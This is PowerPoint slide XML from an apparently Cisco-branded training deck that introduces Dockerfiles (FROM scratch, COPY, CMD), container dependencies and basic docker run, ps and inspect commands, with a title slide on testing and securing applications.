          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914378">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914378">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914378">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB64369F-8F59-47E2-9677-454BB977A06C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="355882" y="1994235"/>
            <a:ext cx="2354784" cy="1524132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C701C80F-DFB7-4472-9C26-51B80DACD25D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="2374269"/>
            <a:ext cx="6355631" cy="2133785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26673662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95301" y="1205898"/>
            <a:ext cx="3887109" cy="3083094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="257175" indent="-257175" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>From </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> We can build on existing docker images if  we wish. ’scratch’ means start with a completely empty image.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="257175" indent="-257175" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="257175" indent="-257175" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Copy the local directory file ‘hello’ into the          container image.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="257175" indent="-257175" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="257175" indent="-257175" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The command to run inside the image whenever someone run’s your image.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31204B01-8BEA-41FF-AA2B-E57534978D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="1410291"/>
            <a:ext cx="3588908" cy="2322918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39654105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C29B8-9652-47D0-AAFB-7F133DFDBDEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488188" y="514350"/>
            <a:ext cx="8167623" cy="384721"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t> continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600D1401-FC0C-4B2F-A1AF-979C4DF609CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="674032" y="1661081"/>
            <a:ext cx="7795936" cy="1821338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2875558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 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Containerised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> App’ needs all it’s dependencies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1073554"/>
            <a:ext cx="8706234" cy="3728633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Exactly the same code... Just isolated - The compiled C binary ‘hello’ was the only thing in the last container, because it needed no dependencies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Something more complex - What if we wanted to run something like NGINX (webserver) as part of our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>containerised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> application? There will be more dependencies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>In the Sever/VM model, these dependencies would be installed as extra packages via your package management tool (APT, YUM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>‘Full OS containers’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914378" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>A co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ntainer can have a whole Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>userspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to build on (such as Ubuntu) in order to make complex software installs easier. </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281" t="2608"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514137" y="2093026"/>
            <a:ext cx="5394960" cy="1077686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1475977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62301" y="951481"/>
            <a:ext cx="8277344" cy="3389312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> run &lt;new image id&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Currently running containers?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="462301" y="2646137"/>
            <a:ext cx="8513064" cy="1297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258960" indent="-257175" defTabSz="914378">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t> inspect &lt;Container ID&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1785" indent="0" defTabSz="914378">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>        Every container gets it’s own IP address. Usually on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>NAT’ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t> network in the host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1785" indent="0" defTabSz="914378">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>        Inspect gives you the details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1785" indent="0" defTabSz="914378">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>         </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06" r="54661"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042737" y="1742977"/>
            <a:ext cx="7058276" cy="903161"/>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32870" b="5787"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020234" y="3864769"/>
            <a:ext cx="5317957" cy="1020779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13204143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EF665-0935-42E1-9339-85CB3664B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="213670"/>
            <a:ext cx="7598042" cy="3867150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:br>
              <a:rPr lang="en-IN" sz="4800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="4800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="4800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="4800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="4800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="4800" dirty="0"/>
              <a:t>Introduction to Testing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="4800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="4800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>Why do we need to perform testing and secure application ??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6107D26-D4A2-490F-BDE9-401E7F1EF26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8294" y="213670"/>
            <a:ext cx="941388" cy="585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663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11B86-5DDF-3F4A-8352-9C8DF4C61447}"/>
              </a:ext>
            </a:extLst>
